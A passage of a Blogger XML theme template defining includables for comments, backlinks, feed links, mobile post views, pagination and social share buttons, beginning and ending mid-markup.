<data:backlink.snippet/>

</dd>

<dd class='comment-footer collapseable'>

<span class='comment-author'><data:post.authorLabel/> <data:backlink.author/></span>

<span class='comment-timestamp'><data:post.timestampLabel/>
<data:backlink.timestamp/></span>

</dd>

</div>

</b:loop>

</dl>

</b:if>

<p class='comment-footer'>

<a class='comment-link' expr:href='data:post.createLinkUrl' expr:id='data:widget.instanceId +


&quot;_backlinks-create-link&quot;' target='_blank'><data:post.createLinkLabel/></a>

</p>

</b:includable>

<b:includable id='comment-form' var='post'>

<div class='comment-form'>

<a name='comment-form'/>

<b:if cond='data:mobile'>

<h4 id='comment-post-message'>

<a expr:id='data:widget.instanceId + &quot;_comment-editor-toggle-link&quot;'


href='javascript:void(0)'><data:postCommentMsg/></a></h4>

<p><data:blogCommentMessage/></p>
<data:blogTeamBlogMessage/>

<a expr:href='data:post.commentFormIframeSrc' id='comment-editor-src'/>

<iframe allowtransparency='true' class='blogger-iframe-colorize blogger-comment-from-post'


expr:height='data:cmtIframeInitialHeight' frameborder='0' id='comment-editor' name='comment-
editor' src='' style='display: none' width='100%'/>

<b:else/>

<h4 id='comment-post-message'><data:postCommentMsg/></h4>

<p><data:blogCommentMessage/></p>

<data:blogTeamBlogMessage/>

<a expr:href='data:post.commentFormIframeSrc' id='comment-editor-src'/>

<iframe allowtransparency='true' class='blogger-iframe-colorize blogger-comment-from-post'


expr:height='data:cmtIframeInitialHeight' frameborder='0' id='comment-editor' name='comment-
editor' src='' width='100%'/>

</b:if>

<data:post.cmtfpIframe/>

<script type='text/javascript'>

BLOG_CMT_createIframe(&#39;<data:post.appRpcRelayPath/>&#39;);

</script>

</div>

</b:includable>

<b:includable id='commentDeleteIcon' var='comment'>

<span expr:class='&quot;item-control &quot; + data:comment.adminClass'>

<b:if cond='data:showCmtPopup'>

<div class='goog-toggle-button'>

<div class='goog-inline-block comment-action-icon'/>

</div>

<b:else/>

<a class='comment-delete' expr:href='data:comment.deleteUrl'


expr:title='data:top.deleteCommentMsg'>

<img src='https://resources.blogblog.com/img/icon_delete13.gif'/>

</a>

</b:if>

</span>
</b:includable>

<b:includable id='comment_count_picker' var='post'>

<b:if cond='data:post.commentSource == 1'>

<span class='cmt_count_iframe_holder' expr:data-count='data:post.numComments' expr:data-


onclick='data:post.addCommentOnclick' expr:data-post-url='data:post.url' expr:data-
url='data:post.url.canonical.http'>

</span>

<b:else/>

<a class='comment-link' expr:href='data:post.addCommentUrl'


expr:onclick='data:post.addCommentOnclick'>

<data:post.commentLabelFull/>:

</a>

</b:if>

</b:includable>

<b:includable id='comment_picker' var='post'>

<b:if cond='data:post.commentSource == 1'>

<b:include data='post' name='iframe_comments'/>

<b:elseif cond='data:post.showThreadedComments'/>

<b:include data='post' name='threaded_comments'/>

<b:else/>

<b:include data='post' name='comments'/>

</b:if>

</b:includable>

<b:includable id='comments' var='post'>

<div class='comments' id='comments'>

<a name='comments'/>

<b:if cond='data:post.allowComments'>

<h4><data:post.commentLabelFull/>:</h4>

<b:if cond='data:post.commentPagingRequired'>

<span class='paging-control-container'>

<b:if cond='data:post.hasOlderLinks'>
<a expr:class='data:post.oldLinkClass'
expr:href='data:post.oldestLinkUrl'><data:post.oldestLinkText/></a>

&#160;

<a expr:class='data:post.oldLinkClass'
expr:href='data:post.olderLinkUrl'><data:post.olderLinkText/></a>

&#160;

</b:if>

<data:post.commentRangeText/>

<b:if cond='data:post.hasNewerLinks'>

&#160;

<a expr:class='data:post.newLinkClass'
expr:href='data:post.newerLinkUrl'><data:post.newerLinkText/></a>

&#160;

<a expr:class='data:post.newLinkClass'
expr:href='data:post.newestLinkUrl'><data:post.newestLinkText/></a>

</b:if>

</span>

</b:if>

<div expr:id='data:widget.instanceId + &quot;_comments-block-wrapper&quot;'>

<dl expr:class='data:post.avatarIndentClass' id='comments-block'>

<b:loop values='data:post.comments' var='comment'>

<dt expr:class='&quot;comment-author &quot; + data:comment.authorClass'


expr:id='data:comment.anchorName'>

<b:if cond='data:comment.favicon'>

<img expr:src='data:comment.favicon' height='16px' style='margin-bottom:-2px;'


width='16px'/>

</b:if>

<a expr:name='data:comment.anchorName'/>

<b:if cond='data:blog.enabledCommentProfileImages'>

<data:comment.authorAvatarImage/>
</b:if>

<b:if cond='data:comment.authorUrl'>

<a expr:href='data:comment.authorUrl' rel='nofollow'><data:comment.author/></a>

<b:else/>

<data:comment.author/>

</b:if>

<data:commentPostedByMsg/>

</dt>

<dd class='comment-body' expr:id='data:widget.instanceId +


data:comment.cmtBodyIdPostfix'>

<b:if cond='data:comment.isDeleted'>

<span class='deleted-comment'><data:comment.body/></span>

<b:else/>

<p>

<data:comment.body/>

</p>

</b:if>

</dd>

<dd class='comment-footer'>

<span class='comment-timestamp'>

<a expr:href='data:comment.url' title='comment permalink'>

<data:comment.timestamp/>

</a>

<b:include data='comment' name='commentDeleteIcon'/>

</span>

</dd>

</b:loop>

</dl>

</div>

<b:if cond='data:post.commentPagingRequired'>
<span class='paging-control-container'>

<a expr:class='data:post.oldLinkClass' expr:href='data:post.oldestLinkUrl'>

<data:post.oldestLinkText/>

</a>

<a expr:class='data:post.oldLinkClass' expr:href='data:post.olderLinkUrl'>

<data:post.olderLinkText/>

</a>

&#160;

<data:post.commentRangeText/>

&#160;

<a expr:class='data:post.newLinkClass' expr:href='data:post.newerLinkUrl'>

<data:post.newerLinkText/>

</a>

<a expr:class='data:post.newLinkClass' expr:href='data:post.newestLinkUrl'>

<data:post.newestLinkText/>

</a>

</span>

</b:if>

<p class='comment-footer'>

<b:if cond='data:post.embedCommentForm'>

<b:if cond='data:post.allowNewComments'>

<b:include data='post' name='comment-form'/>

<b:else/>

<data:post.noNewCommentsText/>

</b:if>

<b:elseif cond='data:post.allowComments'/>

<a expr:href='data:post.addCommentUrl'
expr:onclick='data:post.addCommentOnclick'><data:postCommentMsg/></a>

</b:if>

</p>
</b:if>

<b:if cond='data:showCmtPopup'>

<div id='comment-popup'>

<iframe allowtransparency='true' frameborder='0' id='comment-actions' name='comment-


actions' scrolling='no'>

</iframe>

</div>

</b:if>

<div id='backlinks-container'>

<div expr:id='data:widget.instanceId + &quot;_backlinks-container&quot;'>

<b:include cond='data:post.showBacklinks' data='post' name='backlinks'/>

</div>

</div>

</div>

</b:includable>

<b:includable id='feedLinks'>

<b:if cond='data:blog.pageType != &quot;item&quot;'> <!-- Blog feed links -->

<b:if cond='data:feedLinks'>

<div class='blog-feeds'>

</div>

</b:if>

<b:else/> <!--Post feed links -->

<div class='post-feeds'>

<b:loop values='data:posts' var='post'>

<b:include cond='data:post.allowComments and data:post.feedLinks' data='post.feedLinks'


name='feedLinksBody'/>

</b:loop>

</div>

</b:if>

</b:includable>
<b:includable id='feedLinksBody' var='links'>

<div class='feed-links'>

<data:feedLinksMsg/>

<b:loop values='data:links' var='f'>

<a class='feed-link' expr:href='data:f.url' expr:type='data:f.mimeType'


target='_blank'><data:f.name/> (<data:f.feedType/>)</a>

</b:loop>

</div>

</b:includable>

<b:includable id='iframe_comments' var='post'>

<b:if cond='data:post.allowIframeComments'>

<script expr:src='data:post.iframeCommentSrc' type='text/javascript'/>

<div class='cmt_iframe_holder' expr:data-href='data:post.url.canonical' expr:data-


viewtype='data:post.viewType'/>

<b:if cond='data:post.embedCommentForm == &quot;false&quot;'>

<a expr:href='data:post.addCommentUrl'
expr:onclick='data:post.addCommentOnclick'><data:postCommentMsg/></a>

</b:if>

</b:if>

</b:includable>

<b:includable id='mobile-index-post' var='post'>

<div class='mobile-date-outer date-outer'>

<b:if cond='data:post.dateHeader'>

<div class='date-header'>

<span><data:post.dateHeader/></span>

</div>

</b:if>

<div class='mobile-post-outer'>

<a expr:href='data:post.url'>
<h3 class='mobile-index-title entry-title' itemprop='name'>

<data:post.title/>

</h3>

<div class='mobile-index-arrow'>&amp;rsaquo;</div>

<div class='mobile-index-contents'>

<b:if cond='data:post.thumbnailUrl'>

<div class='mobile-index-thumbnail'>

<div class='Image'>

<img expr:src='data:post.thumbnailUrl'/>

</div>

</div>

</b:if>

<div class='post-body'>

<b:if cond='data:post.snippet'><data:post.snippet/></b:if>

</div>

</div>

<div style='clear: both;'/>

</a>

<div class='mobile-index-comment'>

<b:include cond='data:blog.pageType != &quot;static_page&quot; and


data:post.allowComments and data:post.numComments != 0' data='post'
name='comment_count_picker'/>

</div>

</div>

</div>

</b:includable>

<b:includable id='mobile-main' var='top'>


<!-- posts -->

<div class='blog-posts hfeed'>

<b:include data='top' name='status-message'/>

<b:if cond='data:blog.pageType == &quot;index&quot;'>

<b:loop values='data:posts' var='post'>

<b:include data='post' name='mobile-index-post'/>

</b:loop>

<b:else/>

<b:loop values='data:posts' var='post'>

<b:include data='post' name='mobile-post'/>

</b:loop>

</b:if>

</div>

<b:include name='mobile-nextprev'/>

</b:includable>

<b:includable id='mobile-nextprev'>

<div class='blog-pager' id='blog-pager'>

<b:if cond='data:newerPageUrl'>

<div class='mobile-link-button' id='blog-pager-newer-link'>

<a class='blog-pager-newer-link' expr:href='data:newerPageUrl' expr:id='data:widget.instanceId +


&quot;_blog-pager-newer-link&quot;' expr:title='data:newerPageTitle'>&amp;lsaquo;</a>

</div>

</b:if>

<b:if cond='data:olderPageUrl'>

<div class='mobile-link-button' id='blog-pager-older-link'>

<a class='blog-pager-older-link' expr:href='data:olderPageUrl' expr:id='data:widget.instanceId +


&quot;_blog-pager-older-link&quot;' expr:title='data:olderPageTitle'>&amp;rsaquo;</a>

</div>
</b:if>

<div class='mobile-link-button' id='blog-pager-home-link'>

<a class='home-link' expr:href='data:blog.homepageUrl'><data:homeMsg/></a>

</div>

<div class='mobile-desktop-link'>

<a class='home-link' expr:href='data:desktopLinkUrl'><data:desktopLinkMsg/></a>

</div>

</div>

<div class='clear'/>

</b:includable>

<b:includable id='mobile-post' var='post'>

<div class='date-outer'>

<b:if cond='data:post.dateHeader'>

<h2 class='date-header'><span><data:post.dateHeader/></span></h2>

</b:if>

<div class='date-posts'>

<div class='post-outer'>

<div class='post hentry uncustomized-post-template' itemscope='itemscope'


itemtype='http://schema.org/BlogPosting'>

<b:if cond='data:post.thumbnailUrl'>

<meta expr:content='data:post.thumbnailUrl' itemprop='image_url'/>

</b:if>

<meta expr:content='data:blog.blogId' itemprop='blogId'/>

<meta expr:content='data:post.id' itemprop='postId'/>

<a expr:name='data:post.id'/>

<b:if cond='data:post.title'>
<b:if cond='data:blog.pageType == &quot;index&quot;'>

<h2 class='post-title entry-title' itemprop='name'>

<b:if cond='data:post.link'>

<a expr:href='data:post.link' itemprop='url'><data:post.title/></a>

<b:else/>

<b:if cond='data:post.url'>

<a expr:href='data:post.url' itemprop='url'><data:post.title/></a>

<b:else/>

<data:post.title/>

</b:if>

</b:if>

</h2>

<b:elseif cond='data:blog.pageType == &quot;archive&quot;'/>

<h2 class='post-title entry-title' itemprop='name'>

<b:if cond='data:post.link'>

<a expr:href='data:post.link' itemprop='url'><data:post.title/></a>

<b:else/>

<b:if cond='data:post.url'>

<a expr:href='data:post.url' itemprop='url'><data:post.title/></a>

<b:else/>

<data:post.title/>

</b:if>

</b:if>

</h2>

<b:else/>

<h1 class='post-title entry-title' itemprop='name'>

<b:if cond='data:post.link'>

<data:post.title/>

<b:else/>

<b:if cond='data:post.url'>

<data:post.title/>
<b:else/>

<data:post.title/>

</b:if>

</b:if>

</h1>

</b:if>

</b:if>

<div class='post-header'>

<div class='post-header-line-1'/>

</div>

<div class='post-body entry-content' expr:id='&quot;post-body-&quot; + data:post.id'


itemprop='articleBody'>

<data:post.body/>

<div style='clear: both;'/> <!-- clear for photos floats -->

</div>

<div class='post-footer'>

<div class='post-footer-line post-footer-line-1'>

<span class='post-author vcard'>

<b:if cond='data:top.showAuthor'>

<b:if cond='data:post.authorProfileUrl'>

<span class='fn' itemprop='author' itemscope='itemscope'


itemtype='http://schema.org/Person'>

<meta expr:content='data:post.authorProfileUrl' itemprop='url'/>

<a expr:href='data:post.authorProfileUrl' rel='author' title='author profile'>

<span itemprop='name'><data:post.author/></span>

</a>

</span>

<b:else/>
<span class='fn' itemprop='author' itemscope='itemscope'
itemtype='http://schema.org/Person'>

<span itemprop='name'><data:post.author/></span>

</span>

</b:if>

</b:if>

</span>

<span class='post-timestamp'>

<b:if cond='data:top.showTimestamp'>

<data:top.timestampLabel/>

<b:if cond='data:post.url'>

<meta expr:content='data:post.canonicalUrl' itemprop='url'/>

<a class='timestamp-link' expr:href='data:post.url' rel='bookmark' title='permanent


link'><abbr class='published' expr:title='data:post.timestampISO8601'
itemprop='datePublished'><data:post.timestamp/></abbr></a>

</b:if>

</b:if>

</span>

<span class='post-comment-link'>

<b:include cond='data:blog.pageType not in {&quot;item&quot;,&quot;static_page&quot;}


and data:post.allowComments' data='post' name='comment_count_picker'/>

</span>

</div>

<div class='post-footer-line post-footer-line-2'>

<b:if cond='data:top.showMobileShare'>

<div class='mobile-link-button goog-inline-block' id='mobile-share-button'>

<a href='javascript:void(0);'><data:shareMsg/></a>

</div>

</b:if>
<b:if cond='data:top.showDummy'>

<div class='goog-inline-block dummy-container'><data:post.dummyTag/></div>

</b:if>

</div>

</div>

</div>

<b:include cond='data:blog.pageType in {&quot;static_page&quot;,&quot;item&quot;}'


data='post' name='comment_picker'/>

</div>

</div>

</div>

</b:includable>

<b:includable id='nextprev'>

<div class='blog-pager' id='blog-pager'>

<b:if cond='data:newerPageUrl'>

<span id='blog-pager-newer-link'>

<a class='blog-pager-newer-link' expr:href='data:newerPageUrl' expr:id='data:widget.instanceId +


&quot;_blog-pager-newer-link&quot;' expr:title='data:newerPageTitle'><data:newerPageTitle/></a>

</span>

</b:if>

<b:if cond='data:olderPageUrl'>

<span id='blog-pager-older-link'>

<a class='blog-pager-older-link' expr:href='data:olderPageUrl' expr:id='data:widget.instanceId +


&quot;_blog-pager-older-link&quot;' expr:title='data:olderPageTitle'><data:olderPageTitle/></a>

</span>

</b:if>

<a class='home-link' expr:href='data:blog.homepageUrl'><data:homeMsg/></a>


<b:if cond='data:mobileLinkUrl'>

<div class='blog-mobile-link'>

<a expr:href='data:mobileLinkUrl'><data:mobileLinkMsg/></a>

</div>

</b:if>

</div>

<div class='clear'/>

</b:includable>

<b:includable id='post' var='post'>

<div class='post hentry'>

<b:if cond='data:blog.pageType == &quot;index&quot;'>

<b:if cond='data:post.firstImageUrl'>

<div class='block-image'>

<a class='thumb' expr:href='data:post.url'>

<img expr:alt='data:post.title' expr:src='data:post.firstImageUrl'/>

</a>

<b:if cond='data:post.title'>

<font class='retitle'>

<span class='post-retitle'>

<h2 class='post-title entry-title'>

<b:if cond='data:post.link'>

<a expr:href='data:post.link'>

<data:post.title/>

</a>

<b:else/>

<b:if cond='data:post.url'>

<a expr:href='data:post.url'>

<data:post.title/>

</a>

<b:else/>
<data:post.title/>

</b:if>

</b:if>

</h2>

</span>

</font>

</b:if>

</div>

<b:else/>

<b:if cond='data:post.thumbnailUrl'>

<div class='block-image'>

<a class='thumb' expr:href='data:post.url'>

<img expr:alt='data:post.title' expr:src='data:post.thumbnailUrl'/>

</a>

<b:if cond='data:post.title'>

<font class='retitle'>

<span class='post-retitle'>

<h2 class='post-title entry-title'>

<b:if cond='data:post.link'>

<a expr:href='data:post.link'>

<data:post.title/>

</a>

<b:else/>

<b:if cond='data:post.url'>

<a expr:href='data:post.url'>

<data:post.title/>

</a>

<b:else/>

<data:post.title/>
</b:if>

</b:if>

</h2>

</span>

</font>

</b:if>

</div>

<b:else/>

<div class='block-image'>

<a class='thumb' expr:href='data:post.url'>

<img expr:alt='data:post.title' src='http://3.bp.blogspot.com/-


Yw8BIuvwoSQ/VsjkCIMoltI/AAAAAAAAC4c/s55PW6xEKn0/s1600-r/nth.png'/>

</a>

<b:if cond='data:post.title'>

<font class='retitle'>

<span class='post-retitle'>

<h2 class='post-title entry-title'>

<b:if cond='data:post.link'>

<a expr:href='data:post.link'>

<data:post.title/>

</a>

<b:else/>

<b:if cond='data:post.url'>

<a expr:href='data:post.url'>

<data:post.title/>

</a>

<b:else/>

<data:post.title/>

</b:if>
</b:if>

</h2>

</span>

</font>

</b:if>

</div>

</b:if></b:if>

</b:if>

<b:if cond='data:blog.pageType == &quot;archive&quot;'>

<b:if cond='data:post.firstImageUrl'>

<div class='block-image'>

<a class='thumb' expr:href='data:post.url'>

<img expr:alt='data:post.title' expr:src='data:post.firstImageUrl'/>

</a>

<b:if cond='data:post.title'>

<font class='retitle'>

<span class='post-retitle'>

<h2 class='post-title entry-title'>

<b:if cond='data:post.link'>

<a expr:href='data:post.link'>

<data:post.title/>

</a>

<b:else/>

<b:if cond='data:post.url'>

<a expr:href='data:post.url'>

<data:post.title/>

</a>

<b:else/>

<data:post.title/>
</b:if>

</b:if>

</h2>

</span>

</font>

</b:if>

</div>

<b:else/>

<b:if cond='data:post.thumbnailUrl'>

<div class='block-image'>

<a class='thumb' expr:href='data:post.url'>

<img expr:alt='data:post.title' expr:src='data:post.thumbnailUrl'/>

</a>

<b:if cond='data:post.title'>

<font class='retitle'>

<span class='post-retitle'>

<h2 class='post-title entry-title'>

<b:if cond='data:post.link'>

<a expr:href='data:post.link'>

<data:post.title/>

</a>

<b:else/>

<b:if cond='data:post.url'>

<a expr:href='data:post.url'>

<data:post.title/>

</a>

<b:else/>

<data:post.title/>

</b:if>
</b:if>

</h2>

</span>

</font>

</b:if>

</div>

<b:else/>

<div class='block-image'>

<a class='thumb' expr:href='data:post.url'>

<img expr:alt='data:post.title' src='http://3.bp.blogspot.com/-


Yw8BIuvwoSQ/VsjkCIMoltI/AAAAAAAAC4c/s55PW6xEKn0/s1600-r/nth.png'/>

</a>

<b:if cond='data:post.title'>

<font class='retitle'>

<span class='post-retitle'>

<h2 class='post-title entry-title'>

<b:if cond='data:post.link'>

<a expr:href='data:post.link'>

<data:post.title/>

</a>

<b:else/>

<b:if cond='data:post.url'>

<a expr:href='data:post.url'>

<data:post.title/>

</a>

<b:else/>

<data:post.title/>

</b:if>

</b:if>
</h2>

</span>

</font>

</b:if>

</div>

</b:if></b:if>

</b:if>

<b:if cond='data:blog.pageType == &quot;item&quot;'>

&lt;div itemprop=&#39;blogPost&#39; itemscope=&#39;itemscope&#39;


itemtype=&#39;http://schema.org/BlogPosting&#39;&gt;

<meta expr:content='data:post.firstImageUrl' itemprop='image'/>

</b:if>

<div class='post-header'>

<b:if cond='data:blog.pageType == &quot;item&quot;'>

<b:if cond='data:post.title'>

<div class='post-head'><h1 class='post-title entry-title' itemprop='name headline'>

<b:if cond='data:post.link'>

<a expr:href='data:post.link'><data:post.title/></a>

<b:else/>

<b:if cond='data:post.url'>

<b:if cond='data:blog.url != data:post.url'>

<a expr:href='data:post.url'><data:post.title/></a>

<b:else/>

<data:post.title/>

</b:if>

<b:else/>

<data:post.title/>

</b:if>

</b:if>
</h1></div>

</b:if>

<div class='post-meta'>

<span class='post-author vcard'>

<b:if cond='data:top.showAuthor'>

<i class='fa fa-user'/>

<b:if cond='data:post.authorProfileUrl'>

<span class='fn' itemprop='author' itemscope='itemscope'


itemtype='http://schema.org/Person'>

<meta expr:content='data:post.authorProfileUrl' itemprop='url'/>

<a class='g-profile' expr:href='data:post.authorProfileUrl' expr:title='data:post.author'


rel='author'>

<span itemprop='name'><data:post.author/></span>

</a>

</span>

<b:else/>

<span class='fn' itemprop='author' itemscope='itemscope'


itemtype='http://schema.org/Person'>

<a class='g-profile' expr:href='data:post.authorProfileUrl' expr:title='data:post.author'


rel='author'>

<span itemprop='name'><data:post.author/></span></a>

</span>

</b:if>

</b:if>

</span>

<span class='post-timestamp'>

<b:if cond='data:top.showTimestamp'>

<i class='fa fa-calendar-o'/>

<b:if cond='data:post.url'>

<meta expr:content='data:post.canonicalUrl' itemprop='url'/>

<a class='timestamp-link' expr:href='data:post.url' rel='bookmark' title='permanent link'><abbr


class='published timeago' expr:title='data:post.timestampISO8601'
itemprop='datePublished'><data:post.timestamp/></abbr></a>
</b:if>

</b:if>

</span>

<span class='label-head'>

<b:if cond='data:post.labels'>

<i class='fa fa-folder-open-o'/>

<b:loop values='data:post.labels' var='label'>

<a expr:href='data:label.url' rel='tag'><data:label.name/></a><b:if cond='data:label.isLast !=


&quot;true&quot;'>,</b:if>

</b:loop>

</b:if>

</span>

</div>

</b:if>

<b:if cond='data:blog.pageType == &quot;static_page&quot;'>

<b:if cond='data:post.title'>

<div class='post-head'><h1 class='post-title entry-title' itemprop='name'>

<b:if cond='data:post.link'>

<a expr:href='data:post.link'><data:post.title/></a>

<b:else/>

<b:if cond='data:post.url'>

<b:if cond='data:blog.url != data:post.url'>

<a expr:href='data:post.url'><data:post.title/></a>

<b:else/>

<data:post.title/>

</b:if>

<b:else/>

<data:post.title/>

</b:if>

</b:if>

</h1></div>
</b:if>

</b:if>

</div>

<!-- Then use the post body as the schema.org description, for good G+/FB snippeting. -->

<b:if cond='data:blog.pageType == &quot;item&quot;'>

<article>

<div class='post-body entry-content' expr:id='&quot;post-body-&quot; + data:post.id'


itemprop='articleBody'>

<meta expr:content='data:post.snippet' name='twitter:description'/>

<data:post.body/>

</div>

</article>

</b:if>

<b:if cond='data:blog.pageType == &quot;static_page&quot;'>

<article> <div class='post-body entry-content' expr:id='&quot;post-body-&quot; + data:post.id'


itemprop='articleBody'>

<meta expr:content='data:post.snippet' name='twitter:description'/>

<data:post.body/>

</div>

</article>

</b:if>

<b:if cond='data:post.hasJumpLink'>

<div class='jump-link'>

<a expr:href='data:post.url + &quot;#more&quot;'


expr:title='data:post.title'><data:post.jumpText/></a>

</div>
</b:if>

<div class='post-footer'>

<b:if cond='data:blog.pageType == &quot;item&quot;'>

<div class='share-box'>

<h8 class='share-title'>Share This:</h8>

<div class='share-art'>

<a class='fac-art' expr:href='&quot;http://www.facebook.com/sharer.php?u=&quot; + data:post.url


+ &quot;&amp;title=&quot;+ data:post.title' onclick='window.open(this.href,
&apos;windowName&apos;, &apos;width=600, height=400, left=24, top=24, scrollbars,
resizable&apos;); return false;' rel='nofollow' target='_blank'><i class='fa fa-facebook'/><span
class='resp_del'> Facebook</span></a>

<a class='twi-art' expr:href='&quot;http://twitter.com/share?url=&quot; + data:post.url +


&quot;&amp;title=&quot; + data:post.title' onclick='window.open(this.href,
&apos;windowName&apos;, &apos;width=600, height=400, left=24, top=24, scrollbars,
resizable&apos;); return false;' rel='nofollow' target='_blank'><i class='fa fa-twitter'/><span
class='resp_del2'> Twitter</span></a>

<a class='goo-art' expr:href='&quot;https://plus.google.com/share?url=&quot; + data:post.url +


&quot;&amp;title=&quot; + data:post.title' onclick='window.open(this.href,
&apos;windowName&apos;, &apos;width=600, height=400, left=24, top=24, scrollbars,
resizable&apos;); return false;' rel='nofollow' target='_blank'><i class='fa fa-google-plus'/><span
class='resp_del3'> Google+</span></a>

<a class='pin-art' expr:href='&quot;http://pinterest.com/pin/create/button/?url=&quot; +


data:post.url + &quot;&amp;media=&quot; + data:post.firstImageUrl +
&quot;&amp;description=&quot; + data:post.snippet' onclick='window.open(this.href,
&apos;windowName&apos;, &apos;width=600, height=400, left=24, top=24, scrollbars,
resizable&apos;); return false;' rel='nofollow' target='_blank'><i class='fa fa-pinterest'/><span
class='resp_del4'> Pinterest</span></a>

<a class='lin-art' expr:href='&quot;http://www.linkedin.com/shareArticle?url=&quot; + data:post.url


+ &quot;&amp;title=&quot;+ data:post.title' onclick='window.open(this.href,
&apos;windowName&apos;, &apos;width=600, height=400, left=24, top=24, scrollbars,
resizable&apos;); return false;' rel='nofollow' target='_blank'><i class='fa fa-linkedin-square'/><span
class='resp_del5'> Linkedin</span></a>
<whatsapp expr:href='data:post.url' expr:text='data:post.title'/>

<a class='wat-art' expr:href='&quot;whatsapp://send?text=&quot; + data:post.title + &quot;


&gt;&gt; &quot; + data:post.url' rel='nofollow' target='_blank'><i class='fa fa-whatsapp'/><span
class='resp_del5'> Whatsapp</span></a>

</div>

</div>

<div style='clear:both'/>

<div id='related-posts'>

<b:if cond='data:post.labels'>

<b:loop values='data:post.labels' var='label'>

<b:if cond='data:label.isLast == &quot;true&quot;'>

<data:label.name/>

</b:if>

</b:loop>

</b:if>

</div>

</b:if>

<div class='post-footer-line post-footer-line-1'>

<span class='post-author vcard'>

<b:if cond='data:top.showAuthor'>

<data:top.authorLabel/>

<b:if cond='data:post.authorProfileUrl'>

<span class='fn' itemprop='author' itemscope='itemscope'


itemtype='http://schema.org/Person'>

<meta expr:content='data:post.authorProfileUrl' itemprop='url'/>

<a class='g-profile' expr:href='data:post.authorProfileUrl' rel='author' title='author profile'>

<span itemprop='name'><data:post.author/></span>

</a>

</span>
<b:else/>

<span class='fn' itemprop='author' itemscope='itemscope'


itemtype='http://schema.org/Person'>

<span itemprop='name'><data:post.author/></span>

</span>

</b:if>

</b:if>

</span>

<span class='post-timestamp'>

<b:if cond='data:top.showTimestamp'>

<data:top.timestampLabel/>

<b:if cond='data:post.url'>

<meta expr:content='data:post.canonicalUrl' itemprop='url'/>

<a class='timestamp-link' expr:href='data:post.url' rel='bookmark' title='permanent


link'><abbr class='published' expr:title='data:post.timestampISO8601'
itemprop='datePublished'><data:post.timestamp/></abbr></a>

</b:if>

</b:if>

</span>

<span class='reaction-buttons'>

<b:if cond='data:top.showReactions'>

<table border='0' cellpadding='0' cellspacing='0' width='100%'><tr>

<td class='reactions-label-cell' nowrap='nowrap' valign='top' width='1%'>

<span class='reactions-label'>

<data:top.reactionsLabel/></span>&#160;</td>

<td><iframe allowtransparency='true' class='reactions-iframe'


expr:src='data:post.reactionsUrl' frameborder='0' name='reactions' scrolling='no'/></td>

</tr></table>

</b:if>

</span>
<span class='post-comment-link'>

<b:include cond='data:blog.pageType not in {&quot;item&quot;,&quot;static_page&quot;}


and data:post.allowComments' data='post' name='comment_count_picker'/>

</span>

<!-- backlinks -->

<span class='post-backlinks post-comment-link'>

<b:if cond='data:blog.pageType not in {&quot;item&quot;,&quot;static_page&quot;}


and data:post.showBacklinks'>

<a class='comment-link' expr:href='data:post.url +


&quot;#links&quot;'><data:top.backlinkLabel/></a>

</b:if>

</span>

<span class='post-icons'>

<!-- email post links -->

<b:if cond='data:post.emailPostUrl'>

<span class='item-action'>

<a expr:href='data:post.emailPostUrl' expr:title='data:top.emailPostMsg'>

<img alt='' class='icon-action' height='13' src='//img1.blogblog.com/img/icon18_email.gif'


width='18'/>

</a>

</span>

</b:if>

<!-- quickedit pencil -->

<b:include data='post' name='postQuickEdit'/>

</span>

<!-- share buttons -->

<div class='post-share-buttons goog-inline-block'>


<b:include cond='data:post.sharePostUrl' data='post' name='shareButtons'/>

</div>

</div>

<div class='post-footer-line post-footer-line-2'>

<span class='post-labels'>

<b:if cond='data:post.labels'>

<data:postLabelsLabel/>

<b:loop values='data:post.labels' var='label'>

<a expr:href='data:label.url' rel='tag'><data:label.name/></a><b:if cond='not


data:label.isLast'>,</b:if>

</b:loop>

</b:if>

</span>

</div>

<div class='post-footer-line post-footer-line-3'>

<span class='post-location'>

<b:if cond='data:top.showLocation'>

<b:if cond='data:post.location'>

<data:postLocationLabel/>

<a expr:href='data:post.location.mapsUrl' target='_blank'><data:post.location.name/></a>

</b:if>

</b:if>

</span>

</div>

<b:if cond='data:post.authorAboutMe'>

<div class='author-profile' itemprop='author' itemscope='itemscope'


itemtype='http://schema.org/Person'>

<b:if cond='data:post.authorPhoto.url'>

<img expr:src='data:post.authorPhoto.url' itemprop='image' width='50px'/>


</b:if>

<div>

<a class='g-profile' expr:href='data:post.authorProfileUrl' itemprop='url' rel='author'


title='author profile'>

<span itemprop='name'><data:post.author/></span>

</a>

</div>

<span itemprop='description'><data:post.authorAboutMe/></span>

</div>

</b:if>

</div>

<b:if cond='data:blog.pageType == &quot;item&quot;'>

&lt;/div&gt;

</b:if>

</div>

</b:includable>

<b:includable id='postQuickEdit' var='post'>

<b:if cond='data:post.editUrl'>

<span expr:class='&quot;item-control &quot; + data:post.adminClass'>

<a expr:href='data:post.editUrl' expr:title='data:top.editPostMsg'>

<img alt='' class='icon-action' height='18'


src='https://resources.blogblog.com/img/icon18_edit_allbkg.gif' width='18'/>

</a>

</span>

</b:if>

</b:includable>

<b:includable id='shareButtons' var='post'>

<b:if cond='data:top.showEmailButton'><a class='goog-inline-block share-button sb-email'


expr:href='data:post.sharePostUrl + &quot;&amp;target=email&quot;'
expr:title='data:top.emailThisMsg' target='_blank'><span class='share-button-link-
text'><data:top.emailThisMsg/></span></a></b:if><b:if cond='data:top.showBlogThisButton'><a
class='goog-inline-block share-button sb-blog' expr:href='data:post.sharePostUrl +
&quot;&amp;target=blog&quot;' expr:onclick='&quot;window.open(this.href,
\&quot;_blank\&quot;, \&quot;height=270,width=475\&quot;); return false;&quot;'
expr:title='data:top.blogThisMsg' target='_blank'><span class='share-button-link-
text'><data:top.blogThisMsg/></span></a></b:if><b:if cond='data:top.showTwitterButton'><a
class='goog-inline-block share-button sb-twitter' expr:href='data:post.sharePostUrl +
&quot;&amp;target=twitter&quot;' expr:title='data:top.shareToTwitterMsg' target='_blank'><span
class='share-button-link-text'><data:top.shareToTwitterMsg/></span></a></b:if><b:if
cond='data:top.showFacebookButton'><a class='goog-inline-block share-button sb-facebook'
expr:href='data:post.sharePostUrl + &quot;&amp;target=facebook&quot;'
expr:onclick='&quot;window.open(this.href, \&quot;_blank\&quot;,
\&quot;height=430,width=640\&quot;); return false;&quot;'
expr:title='data:top.shareToFacebookMsg' target='_blank'><span class='share-button-link-
text'><data:top.shareToFacebookMsg/></span></a></b:if><b:if
cond='data:top.showPinterestButton'><a class='goog-inline-block share-button sb-pinterest'
expr:href='data:post.sharePostUrl + &quot;&amp;target=pinterest&quot;'
expr:title='data:top.shareToPinterestMsg' target='_blank'><span class='share-button-link-
